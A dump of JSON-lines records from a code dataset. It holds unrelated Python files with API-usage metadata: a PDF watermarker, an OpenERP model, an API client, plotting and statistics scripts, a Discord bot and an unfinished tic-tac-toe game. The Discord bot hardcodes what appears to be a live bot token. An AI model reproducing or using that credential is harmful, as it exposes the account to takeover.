"wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 603, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.workflow.WorkflowStatus", "line_number": 603, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 603, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.workflow.PreviewRevisionForTask", "line_number": 607, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 607, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 611, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.history.WorkflowHistoryView", "line_number": 611, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.history", "line_number": 611, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 616, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.history.WorkflowHistoryDetailView", "line_number": 616, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.history", "line_number": 616, "usage_type": "name"}, {"api_name": "wagtail.admin.viewsets.model.ModelViewSet", "line_number": 621, "usage_type": "name"}, {"api_name": "wagtail.snippets.views.chooser.SnippetChooserViewSet", "line_number": 803, "usage_type": "name"}, {"api_name": "django.core.exceptions.ImproperlyConfigured", "line_number": 834, "usage_type": "call"}, {"api_name": "wagtail.models.PreviewableMixin", "line_number": 842, "usage_type": "argument"}, {"api_name": "wagtail.models.RevisionMixin", "line_number": 843, "usage_type": "argument"}, {"api_name": "wagtail.models.DraftStateMixin", "line_number": 844, "usage_type": "argument"}, {"api_name": "wagtail.models.WorkflowMixin", "line_number": 845, "usage_type": "argument"}, {"api_name": "wagtail.models.LockableMixin", "line_number": 846, "usage_type": "argument"}, {"api_name": "wagtail.admin.ui.tables.LiveStatusTagColumn", "line_number": 861, "usage_type": "call"}, {"api_name": "wagtail.admin.views.generic.RevisionsRevertMixin", "line_number": 878, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 878, "usage_type": "name"}, {"api_name": "wagtail.permissions.ModelPermissionPolicy", "line_number": 885, 
"usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 1200, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 1207, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 1214, "usage_type": "call"}, {"api_name": "wagtail.admin.menu.MenuItem", "line_number": 1258, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 1271, "usage_type": "call"}, {"api_name": "wagtail.snippets.models.SnippetAdminURLFinder", "line_number": 1397, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 1402, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1403, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1404, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1405, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1406, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1407, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1408, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1413, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1418, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1419, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1429, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1437, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 1442, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1451, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1456, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1461, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1462, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1467, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1472, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1477, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1482, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1487, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1492, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1501, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1511, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1512, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 1513, "usage_type": "call"}, {"api_name": "wagtail.admin.panels.group.ObjectList", "line_number": 1529, "usage_type": "call"}, {"api_name": "wagtail.admin.panels.group.ObjectList", "line_number": 1534, "usage_type": "call"}, {"api_name": "wagtail.admin.panels.model_utils.extract_panel_definitions_from_model_class", "line_number": 1537, "usage_type": "call"}, {"api_name": "wagtail.admin.panels.group.ObjectList", "line_number": 1540, "usage_type": "call"}, {"api_name": "wagtail.admin.checks.check_panels_in_model", "line_number": 1548, "usage_type": "call"}, {"api_name": "django.core.checks.register", "line_number": 1550, "usage_type": "call"}, {"api_name": "django.core.checks", "line_number": 1550, "usage_type": "name"}, {"api_name": "wagtail.hooks.register", "line_number": 1554, "usage_type": "call"}, {"api_name": "wagtail.hooks", "line_number": 1554, "usage_type": "name"}, {"api_name": "wagtail.hooks.register", "line_number": 1556, 
"usage_type": "call"}, {"api_name": "wagtail.hooks", "line_number": 1556, "usage_type": "name"}, {"api_name": "wagtail.admin.viewsets.viewsets.register", "line_number": 1563, "usage_type": "call"}, {"api_name": "wagtail.admin.viewsets.viewsets", "line_number": 1563, "usage_type": "name"}, {"api_name": "wagtail.admin.menu.Menu", "line_number": 1641, "usage_type": "call"}, {"api_name": "wagtail.admin.menu.SubmenuMenuItem", "line_number": 1642, "usage_type": "call"}, {"api_name": "wagtail.hooks.register", "line_number": 1652, "usage_type": "call"}, {"api_name": "wagtail.hooks", "line_number": 1652, "usage_type": "name"}, {"api_name": "wagtail.hooks.register", "line_number": 1654, "usage_type": "call"}, {"api_name": "wagtail.hooks", "line_number": 1654, "usage_type": "name"}]} +{"seq_id": "594274601", "text": "import PyPDF2\n\n# create objects of pdf-s\ntemplete = PyPDF2.PdfFileReader(open('super.pdf', 'rb'))\nwatermark = PyPDF2.PdfFileReader(open('watermark.pdf', 'rb'))\n\noutput = PyPDF2.PdfFileWriter()\n\nfor i in range(templete.getNumPages()):\n # go thro all pages in templete\n page = templete.getPage(i)\n # merge two pages\n page.mergePage(watermark.getPage(0))\n # add page in memory so it can be saved later\n output.addPage(page)\n print(f'page {i} done')\n\nwith open('new_water_pdf.pdf', 'wb') as file:\n # save file form memory\n output.write(file)\nprint('All done!')\n", "sub_path": "watermark.py", "file_name": "watermark.py", "file_ext": "py", "file_size_in_byte": 584, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "PyPDF2.PdfFileReader", "line_number": 4, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileReader", "line_number": 5, "usage_type": "call"}, {"api_name": "PyPDF2.PdfFileWriter", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "505447894", "text": "# -*- coding: utf-8 -*-\nimport logging\n_logger = logging.getLogger(__name__)\n\nfrom openerp import api, models, fields\nfrom openerp.exceptions import Warning\n\nclass AccountPaymentMode(models.Model):\n _inherit = 'account.payment.mode'\n _order = 'position'\n \n position = fields.Integer(\n string='Posicion'\n )", "sub_path": "ont_base_account/models/account_payment_mode.py", "file_name": "account_payment_mode.py", "file_ext": "py", "file_size_in_byte": 327, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 3, "usage_type": "call"}, {"api_name": "openerp.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "openerp.models", "line_number": 8, "usage_type": "name"}, {"api_name": "openerp.fields.Integer", "line_number": 12, "usage_type": "call"}, {"api_name": "openerp.fields", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "421972881", "text": "#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport re\n\ncontent_api = 'http://api.dev.kcis.cn/v1/nlp/Takecontent/getdata'\ntag_api = 'http://api.dev.kcis.cn/v1/nlp/baidu/tags'\nheaders = {'user-agent': 'Mozilla/5.0'}\n\n\ndef get_content(url):\n    \"\"\"\n    Extract the article title and content from the given url\n    \"\"\"\n    r = requests.post(content_api, data={'linkurl': url})\n    get_data = json.loads(r.text)\n    if 'result' in get_data:\n        get_data = get_data['result']\n        title = get_data.get('Title')\n        content = get_data.get('Content')\n        if content:\n            content = re.sub(r'<[^>]+>', '', content).strip()\n    else:\n        title, content = None, None\n    return title, content\n\n\ndef get_tag(title, content):\n    \"\"\"\n    Extract related tags from the article title and content (returns a dict)\n    \"\"\"\n    r = requests.post(tag_api, data={'title': title, 'content': content})\n    get_data = json.loads(r.text)\n    tag_key = ['TOPIC', 'KEYWORDS', 'PER', 'LOC', 'ORG']\n    tag_item = dict()\n    if 'result' in get_data:\n        get_data = get_data['result']\n        for key in tag_key:\n            if get_data.get(key):\n                tag_item[key] = ','.join([str(i) for i in (get_data.get(key))])\n            else:\n                tag_item[key] = None\n    else:\n        for key in tag_key:\n            tag_item[key] = None\n    return tag_item\n", "sub_path": "newsctaly_byndapi.py", "file_name": "newsctaly_byndapi.py", "file_ext": "py", "file_size_in_byte": 1373, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 16, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "511317275", "text": "from dc3D import tworesolution_dual_contour\n\nimport numpy as np\nimport dcHelpers\n\nimport cPickle\n\n\ndef transform_dict(cellsDict):\n    dataset = {}\n    for key in cellsDict:\n        dataset[key] = -1\n\n    return dataset\n\n\nwfFile = open('Cantilever/Cells_01', 'rb')\ncellsDict = cPickle.load(wfFile)\nwfFile.close()\n\nwfFile = open('Cantilever/Dimensions_01', 'rb')\ndimensions = cPickle.load(wfFile)\nwfFile.close()\n\nres_fine = 1\nres_coarse = res_fine * 2.0\nresolutions = {'fine': res_fine,'coarse': res_coarse}\n\ndata = transform_dict(cellsDict)\n\n[verts_out_dc, quads_out_dc] = tworesolution_dual_contour(data, resolutions, dimensions)\n\ndcHelpers.export_as_stl(quads_out_dc, verts_out_dc, plot_scale = 'coarse', filename = 'canti.stl')\ndcHelpers.export_as_stl(quads_out_dc, verts_out_dc, plot_scale = 'fine', filename = 'canfi_fine.stl')\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection, Line3DCollection\n\nfig = plt.figure()\nax = Axes3D(fig)\nax.set_aspect('equal')\n\nplot_scale = 'coarse'\nfor q in quads_out_dc[plot_scale]:\n    vtx = verts_out_dc[plot_scale][q]\n    x = vtx[:,0].tolist()\n    y = vtx[:,1].tolist()\n    z = vtx[:,2].tolist()\n    vtx = [zip(x,y,z)]\n    poly=Poly3DCollection(vtx)\n    poly.set_color('r')\n    poly.set_edgecolor('k')\n    poly.set_alpha(.25)\n    ax.add_collection3d(poly)\n\n''' # useful for debugging\nfor m_e_key, m_edge in manifold_edges_dc[plot_scale].items():\n    vtx = verts_out_dc[plot_scale][[m_e_key[0],m_e_key[1]]]\n    x = vtx[:, 0]\n    y = vtx[:, 1]\n    z = vtx[:, 2]\n    vtx = [zip(x,y,z)]\n    line = Line3DCollection(vtx,color='r',linewidth=1.0)\n    ax.add_collection3d(line)\n\n    for local_idx in range(2):\n        if m_edge.v_kind[local_idx] == 
\"inside\":\n plotcolor = 'ro'\n elif m_edge.v_kind[local_idx] == \"outside\":\n plotcolor = 'gx'\n elif m_edge.v_kind[local_idx] == \"manifold\":\n plotcolor = 'k*'\n elif m_edge.v_kind[local_idx] == \"hybrid\":\n plotcolor = 'ks'\n else:\n print \"ERROR!\"\n vtx = verts_out_dc[plot_scale][m_e_key[local_idx]]\n ax.plot([vtx[0]],[vtx[1]],[vtx[2]],plotcolor)\n'''\n\nplot_scale = 'fine'\nfor q in quads_out_dc[plot_scale]:\n vtx = verts_out_dc[plot_scale][q]\n x = vtx[:,0].tolist()\n y = vtx[:,1].tolist()\n z = vtx[:,2].tolist()\n vtx = [zip(x,y,z)]\n poly=Poly3DCollection(vtx)\n poly.set_color('b')\n poly.set_edgecolor('k')\n poly.set_alpha(.25)\n ax.add_collection3d(poly)\n'''\nprint \"number of faces: \"+str(quads_out_dc[plot_scale].__len__())\nprint \"number of tri: \"+str(no_t)\nprint \"number of quads: \"+str(no_q)\nprint \"number of pents: \"+str(no_p)\nprint \"number of hex: \"+str(no_h)\nprint \"number of unex:\"+str(no_u)\n'''\nax.set_xlim3d(dimensions['xmin'], dimensions['xmax'])\nax.set_ylim3d(dimensions['ymin'], dimensions['ymax'])\nax.set_zlim3d(dimensions['zmin'], dimensions['zmax'])\nplt.show()\n\n\n", "sub_path": "Prototypes/PYTHON/Sandbox/DC_OOP/example_Cantilever.py", "file_name": "example_Cantilever.py", "file_ext": "py", "file_size_in_byte": 2953, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "cPickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "cPickle.load", "line_number": 22, "usage_type": "call"}, {"api_name": "dc3D.tworesolution_dual_contour", "line_number": 31, "usage_type": "call"}, {"api_name": "dcHelpers.export_as_stl", "line_number": 33, "usage_type": "call"}, {"api_name": "dcHelpers.export_as_stl", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 41, "usage_type": "call"}, {"api_name": "mpl_toolkits.mplot3d.art3d.Poly3DCollection", "line_number": 51, "usage_type": "call"}, {"api_name": "mpl_toolkits.mplot3d.art3d.Poly3DCollection", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}]} +{"seq_id": "457894643", "text": "from typing import Tuple\r\nimport math\r\n\r\nfrom scratch.probability import normal_cdf, inverse_normal_cdf\r\n\r\n\r\n# %%\r\n\r\ndef normal_approximation_to_binomial(n: int, p: float) -> Tuple[float, float]:\r\n \"\"\"\r\n Returns mu and sigma corresponding to a Binomial(n, p)\r\n \"\"\"\r\n mu = p * n\r\n sigma = math.sqrt(p * (1 - p) * n)\r\n return mu, sigma\r\n\r\n\r\n# The normal cdf _is_ the probability the variable is below a threshold\r\nnormal_probability_below = normal_cdf\r\n\r\n\r\n# It's above the threshold if it's not below the threshold\r\ndef normal_probability_above(lo: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"The probability that a N(mu, sigma) is greater than lo.\"\"\"\r\n return 1 - normal_cdf(lo, mu, sigma)\r\n\r\n\r\n# It's between if it's less than hi, but not less than lo.\r\ndef normal_probability_between(lo: float,\r\n hi: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"The probability that a N(mu, sigma) is between lo and hi.\"\"\"\r\n return normal_cdf(hi, mu, sigma) - normal_cdf(lo, mu, sigma)\r\n\r\n\r\n# It's outside if 
it's not between\r\ndef normal_probability_outside(lo: float,\r\n hi: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"The probability that a N(mu, sigma) is not between lo and hi.\"\"\"\r\n return 1 - normal_probability_between(lo, hi, mu, sigma)\r\n\r\n\r\ndef normal_upper_bound(probability: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"Returns the z for which P(Z <= z) = probability\"\"\"\r\n return inverse_normal_cdf(probability, mu, sigma)\r\n\r\n\r\ndef normal_lower_bound(probability: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> float:\r\n \"\"\"Returns the z for which P(Z >= z) = probability\"\"\"\r\n return inverse_normal_cdf(1 - probability, mu, sigma)\r\n\r\n\r\ndef normal_two_sided_bounds(probability: float,\r\n mu: float = 0,\r\n sigma: float = 1) -> Tuple[float, float]:\r\n \"\"\"\r\n Returns the symmetric (about the mean) bounds\r\n that contain the specified probability\r\n \"\"\"\r\n tail_probability = (1 - probability) / 2\r\n\r\n # upper bound should have tail_probability above it\r\n upper_bound = normal_lower_bound(tail_probability, mu, sigma)\r\n\r\n # lower bound should have tail_probability below it\r\n lower_bound = normal_upper_bound(tail_probability, mu, sigma)\r\n\r\n return lower_bound, upper_bound\r\n\r\n\r\n#%%\r\nmu_0, sigma_0 = normal_approximation_to_binomial(1000, 0.5)\r\nprint(mu_0)\r\nprint(sigma_0)\r\n#%%\r\nlower_bound, upper_bound = normal_two_sided_bounds(0.95, mu_0, sigma_0)\r\nprint(lower_bound)\r\nprint(upper_bound)\r\n#%%\r\nlo, hi = normal_two_sided_bounds(0.95, mu_0, sigma_0)\r\nprint(lo)\r\nprint(hi)\r\n#%%\r\nmu_1, sigma_1 = normal_approximation_to_binomial(1000, 0.55)\r\nprint(mu_1)\r\nprint(sigma_1)\r\n#%%\r\ntype_2_probability = normal_probability_between(lo, hi, mu_1, sigma_1)\r\npower = 1 - type_2_probability\r\nprint(power)\r\n#%%\r\nhi = normal_upper_bound(0.95, mu_0, sigma_0)\r\ntype_2_probability = normal_probability_below(hi, mu_1, sigma_1)\r\npower = 1 - type_2_probability # 0.936\r\nprint(hi)\r\nprint(power)\r\n#%%\r\n\r\n\r\ndef two_sided_p_value(x: float, mu: float = 0, sigma: float = 1) -> float:\r\n \"\"\"\r\n How likely are we to see a value at least as extreme as x (in either\r\n direction) if our values are from a N(mu, sigma)?\r\n \"\"\"\r\n if x >= mu:\r\n # x is greater than the mean, so the tail is everything greater than x\r\n return 2 * normal_probability_above(x, mu, sigma)\r\n else:\r\n # x is less than the mean, so the tail is everything less than x\r\n return 2 * normal_probability_below(x, mu, sigma)\r\n\r\n\r\ntwo_sided_p_value(529.5, mu_0, sigma_0) # 0.062\r\nprint(two_sided_p_value(529.5, mu_0, sigma_0))\r\n#%%\r\nimport random\r\n\r\nextreme_value_count = 0\r\nfor _ in range(1000):\r\n num_heads = sum(1 if random.random() < 0.5 else 0 # Count # of heads\r\n for _ in range(1000)) # in 1000 flips,\r\n if num_heads >= 530 or num_heads <= 470: # and count how often\r\n extreme_value_count += 1 # the # is 'extreme'\r\n\r\n# p-value was 0.062 => ~62 extreme values out of 1000\r\nprint(extreme_value_count)\r\n#%%\r\n", "sub_path": "infer.py", "file_name": "infer.py", "file_ext": "py", "file_size_in_byte": 4485, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "math.sqrt", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 9, "usage_type": "name"}, {"api_name": "scratch.probability.normal_cdf", "line_number": 19, "usage_type": "name"}, {"api_name": 
"scratch.probability.normal_cdf", "line_number": 27, "usage_type": "call"}, {"api_name": "scratch.probability.normal_cdf", "line_number": 36, "usage_type": "call"}, {"api_name": "scratch.probability.inverse_normal_cdf", "line_number": 52, "usage_type": "call"}, {"api_name": "scratch.probability.inverse_normal_cdf", "line_number": 59, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 64, "usage_type": "name"}, {"api_name": "random.random", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "436241367", "text": "import discord\nimport random\nimport discord as disc\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import Bot\nimport secrets\nfrom time import sleep\n\n\nclient = commands.Bot(command_prefix=\".\")\nclient.remove_command(\"help\")\n\n\n@client.event\nasync def on_ready():\n await client.change_presence(status=discord.Status.idle, activity=discord.Game(\"Making me better!!!\"))\n print(\"Hello there! I am Evolution Wing bot at your service.\")\n\n\n@client.event\nasync def on_member_join(member):\n print(f\"{member} has joined. Welcome! I hope you will have fun. :)\")\n\n\n@client.event\nasync def on_member_remove(member):\n print(f\"{member} has left the server. Very sad :(\")\n\n\n@client.event\nasync def on_command_error(ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"Missing Argument.\\nPlease Enter All Required Arguments.\\n\")\n elif isinstance(error, commands.CommandNotFound):\n await ctx.send(\"Command Not Found.\\nType .help To See All The Existing Commands.\\n\")\n elif isinstance(error, commands.MissingPermissions):\n await ctx.send(\"Missing Permission.\\nYou Cannot Use This Command.\\n\")\n\n\n@client.command()\nasync def ping(ctx):\n await ctx.send(f\"(: Ping right now -> {round(client.latency * 1000)}ms <- Ping right now :)\")\n\n\n@client.command()\nasync def serverhelp(ctx):\n await ctx.send(\"Ping someone with admin perms for help.\")\n\n\n@client.command(aliases=['gm',\"morning\"])\nasync def goodmorning(ctx):\n await ctx.send(\"Good morning! Have a nice day.\")\n\n\n@client.command(aliases=['gn',\"night\"])\nasync def goodnight(ctx):\n await ctx.send(\"Good night! Sleep well.\")\n\n\n@client.command()\n@commands.has_permissions(manage_messages=True)\nasync def purge(ctx, amount=2):\n await ctx.channel.purge(limit=amount)\n\n\n@client.command()\n@commands.has_permissions(administrator=True)\nasync def kick(ctx, member : discord.Member, *, reason=None):\n await member.kick(reason=reason)\n\n\n@client.command(aliases=[\"flip\",'coinflip',\"Coin\",'Coinflip',\"Flip\"])\nasync def coin(ctx):\n options = [\"Head\", \"Tails\", 'Lost the coin! cannot verify the results. Try again']\n result = random.choice(options)\n await ctx.send(result)\n\n\n@client.command(aliases=[\"yo\",'hay',\"Yo\",'Hay',\"Hi\"], pass_context=True)\nasync def hi(ctx, member : discord.Member):\n await ctx.send(f\"Hay, {member.mention} What are you doing? 
\\nIs your day going nicely?\\n\")\n    await ctx.message.delete()\n\n\n@client.command(aliases=[\"Bye\"])\nasync def bye(ctx):\n    await ctx.send(\"sayonara\")\n\n\n@client.command(aliases=[\"Help\",'HELP'])\nasync def help(ctx):\n    await ctx.send(\"\"\"Evolution Wing Official Discord Bot\n    \"\"\")\n\n\nclient.run(\"NzYyOTU0NjU3OTM2ODM0NTYw.X3wq5Q.Br5mB_Qo8r1oX3lvJVRqmJLneQo\")", "sub_path": "botapp.py", "file_name": "botapp.py", "file_ext": "py", "file_size_in_byte": 2757, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 10, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 10, "usage_type": "name"}, {"api_name": "discord.Status", "line_number": 16, "usage_type": "attribute"}, {"api_name": "discord.Game", "line_number": 16, "usage_type": "call"}, {"api_name": "discord.ext.commands.MissingRequiredArgument", "line_number": 32, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 32, "usage_type": "name"}, {"api_name": "discord.ext.commands.CommandNotFound", "line_number": 34, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 34, "usage_type": "name"}, {"api_name": "discord.ext.commands.MissingPermissions", "line_number": 36, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 36, "usage_type": "name"}, {"api_name": "discord.ext.commands.has_permissions", "line_number": 61, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 61, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 68, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.has_permissions", "line_number": 67, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 67, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 75, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "108631404", "text": "# MCTS using UCT\n\nimport numpy as np\nfrom collections import namedtuple\nimport tensorflow as tf\nfrom random import shuffle\nimport time\n\nGameStateTuple = namedtuple('GameStateTuple', ['board', 'turn_parity'])\n\nclass TurnParity:\n    def __init__(self):\n        self.sign = 1\n\n    def flip(self):\n        self.sign *= -1\n\n    def __eq__(self, other):\n        return self.sign == other\n\n    def __repr__(self):\n        return str(self.sign)\n\nclass TicTacToe:\n\n    def __init__(self):\n        self.state = GameStateTuple(\n            board=np.zeros(dtype=np.int32, shape=(3,3)),\n            turn_parity=TurnParity())\n\n        self.episode_done = False\n\n    def move_is_valid(self, move, player_id):\n        if self.episode_done:\n            return False\n\n        if self.state.turn_parity != player_id:\n            return False\n\n        i = move[0]\n        j = move[1]\n\n        if self.state.board[i][j] != 0:\n            return False\n\n        return True\n\n    def update_state(self, move, player_id):\n        i = move[0]\n        j = move[1]\n        self.state.board[i][j] = player_id\n        self.state.turn_parity.flip()\n\n    def check_win(self):\n        board = self.state.board\n\n        columnar_victory = np.max(np.abs(np.sum(board, axis=0)) == 3)\n        row_victory = np.max(np.abs(np.sum(board, axis=1)) == 3)\n        forward_slash_victory = np.abs(board[2][0] + board[1][1] + board[0][2]) == 3\n        back_slash_victory = np.abs(board[0][0] + board[1][1] + board[2][2]) == 3\n        \n        if columnar_victory or row_victory or forward_slash_victory or back_slash_victory:\n            return True\n\n        return False\n\n    def check_full(self):\n        board = 
self.state.board\n\n if np.sum(np.abs(board)) == 9:\n return True\n return False\n\n def step(self, move, player_id):\n '''\n Step the environment\n\n :param str move: tuple with row index and column index of a move\n :param str player_id: the ID of the player making the move, either -1 or 1\n :return: tuple with updated state, reward from perspective of player making the move, and indicator about whether game is over\n '''\n assert not self.episode_done\n assert self.move_is_valid(move, player_id)\n\n self.update_state(move, player_id)\n\n win = self.check_win()\n full = self.check_full()\n\n if win:\n reward = 1.0\n self.episode_done = True\n elif full and not win:\n reward = 0.0\n self.episode_done = True\n else:\n reward = 0.0\n\n return self.state, reward, self.episode_done\n\n def reset(self):\n '''\n Reset the environment\n '''\n self.state = GameStateTuple(\n board=np.zeros(dtype=np.int32, shape=(3,3)),\n turn_parity=TurnParity())\n\n self.episode_done = False\n\n def __repr__(self):\n if self.episode_done and self.check_win():\n line1 = str(-1 * self.state.turn_parity.sign) + ' has won.'\n elif self.episode_done:\n line1 = \"it's a tie.\"\n else:\n line1 = str(self.state.turn_parity) + ' to move:'\n\n line2 = str(self.state.board)\n return line1 + '\\n\\n' + line2\n\n def clone(self):\n clone_env = TicTacToe()\n\n board = np.zeros(dtype=np.int32, shape=(3,3))\n for i in range(0,3):\n for j in range(0,3):\n board[i][j] = self.state.board[i][j]\n\n turn_parity = TurnParity()\n\n if self.state.turn_parity == -1:\n turn_parity.flip()\n\n state = GameStateTuple(\n board=board,\n turn_parity=turn_parity)\n\n clone_env.state = state\n return clone_env\n\n\n\ngame = TicTacToe()\n\nprint(game)\ngame.step(move=(1,1), player_id=1)\ngame.step(move=(1,2), player_id=-1)\ngame.step(move=(0,0), player_id=1)\ngame.step(move=(0,2), player_id=-1)\ngame.step(move=(2,2), player_id=1)\nprint(game)\n\ngame.reset()\n\nprint(game)\ngame.step(move=(1,1), player_id=1)\ngame.step(move=(1,2), player_id=-1)\ngame.step(move=(0,0), player_id=1)\ngame.step(move=(0,2), player_id=-1)\ngame.step(move=(2,0), player_id=1)\ngame.step(move=(2,2), player_id=-1)\nprint(game)\n\n\ndef get_me_this_rotation(i):\n if i == 0:\n # identity\n forward = [[0,0], [0,1], [0,2], [1,0], [1,1], [1,2], [2,0], [2,1], [2,2]]\n backward = [[0,0], [0,1], [0,2], [1,0], [1,1], [1,2], [2,0], [2,1], [2,2]]\n elif i == 1:\n # rotate clockwise 90 degrees\n forward = [[2,0], [1,0], [0,0], [2,1], [1,1], [0,1], [2,2], [1,2], [0,2]]\n backward = [[0,2], [1,2], [2,2], [0,1], [1,1], [2,1], [0,0], [1,0], [2,0]]\n elif i == 2:\n # rotate clockwise 180 degrees\n forward = [[2,2], [2,1], [2,0], [1,2], [1,1], [1,0], [0,2], [0,1], [0,0]]\n backward = [[2,2], [2,1], [2,0], [1,2], [1,1], [1,0], [0,2], [0,1], [0,0]]\n elif i == 3:\n forward = [[0,2], [1,2], [2,2], [0,1], [1,1], [2,1], [0,0], [1,0], [2,0]]\n backward = [[2,0], [1,0], [0,0], [2,1], [1,1], [0,1], [2,2], [1,2], [0,2]]\n\n map_to_flat_idxs = lambda ij_pair: (3 * ij_pair[0] + ij_pair[1])\n\n forward = [map_to_flat_idxs(ij_pair) for ij_pair in forward]\n backward = [map_to_flat_idxs(ij_pair) for ij_pair in backward]\n\n return forward, backward\n\ndef get_me_this_reflection(i):\n if i == 0:\n # reflection around the axis 0 degrees clockwise from the vertical\n forward = [[0,2], [0,1], [0,0], [1,2], [1,1], [1,0], [2,2], [2,1], [2,0]]\n backward = [[0,2], [0,1], [0,0], [1,2], [1,1], [1,0], [2,2], [2,1], [2,0]]\n elif i == 1:\n # reflection around the axis 45 degrees clockwise from the vertical\n forward 
